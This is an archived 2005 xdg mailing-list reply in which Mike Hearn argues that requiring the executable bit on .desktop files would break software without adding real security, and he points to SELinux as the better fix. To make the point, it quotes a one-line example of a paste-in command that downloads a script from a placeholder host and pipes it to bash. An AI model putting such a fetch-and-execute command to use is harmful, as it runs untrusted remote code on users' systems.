"Name" key value in desk. entry spec collides with file names, could misguide users?

Mike Hearn mike at navi.cx
Sun Mar 20 19:04:01 EET 2005


Requiring the +x bit on .desktop files changes their semantics and would
break existing software. For such an insignificant change it's not worth
it.

There's nothing magical or far-out about SELinux. It exists and is being
integrated into distributions. It's the right way to solve the problem.
No, it is not widely deployed today but then this is not a widespread
problem today on Linux either (in fact, I never heard of it happening),
so it seems better to solve it correctly so if/when this does become an
issue we haven't simply patched one trivial flaw and ignored the rest
but rather got a solid system in place.

> People who want to shoot themselves in the foot will be able to do it anyway by
> setting +x, sure, but the problem here is that people downloads a .desktop file
> by mail, they will look at its nice icon and the faked name will convince them to
> double click it. 

So what? You can run arbitrary code as root on some distros by attaching
an RPM called "Cool Screensaver" to an email. It doesn't have to have
a .rpm extension to be recognised as a package, and the "box" icon is so
generic nobody is likely to see it and think "hmm maybe I shouldn't
click".

There is a solution to this problem but it doesn't involve piling hacks
upon other hacks and breaking existing software whilst doing it.

> For normal people setting +x it's a _difficult_ task 

It is not, you just have to check the right boxes in the properties
window. Anybody can learn that. I don't agree that this would have any
benefit at all, not even psychological - fundamentally writing trojan
horses is not difficult and if you can convince somebody to click on an
icon you can convince them to copy/paste some meaningless command into
the "Run" dialog like:

  wget http://foo.org/bar.sh -q -O /dev/stdout | bash -

which achieves the same effect.

> Note that requiring the +x bit is something that should have happened _anyway_
> regardless of security and everything. We don't execute .pl files with perl just because
> their extension is .pl. 

But of course anybody can, just by writing "perl foo.pl". The +x bit
offers no security, worse it offers only the illusion of security. I
would like to see Mozilla automatically set the +x bit on executable
files like shell scripts, in fact I filed a bug for that in bugzilla.
Why? Because I don't believe requiring a magic flag to be set to run a
program makes things more secure, it just decreases usability. 

> Anyway, requiring the +x bit WILL improve security at the end of the day.

Asserting this doesn't make it true. I don't see any evidence that it
increases security, just vague ideas about what people might or might
not do in hypothetical situations. 

If somebody wants the computer to do something, eventually they will
figure out how especially if we provide a nice GUI for it as all
desktops do. If that wasn't true then there'd be no point in trying to
make discoverable UI, but there is a wealth of usability studies that
show how people can make a computer do what they want by exploring the
user interface and discovering new features.

In short, I think requiring +x on .desktop files:

a) Does not increase security
b) Breaks existing software and specifications (this is BAD!)
c) Gives people an impression of security which does not exist, so
   reducing incentives to work on real solutions

thanks -mike




More information about the xdg mailing list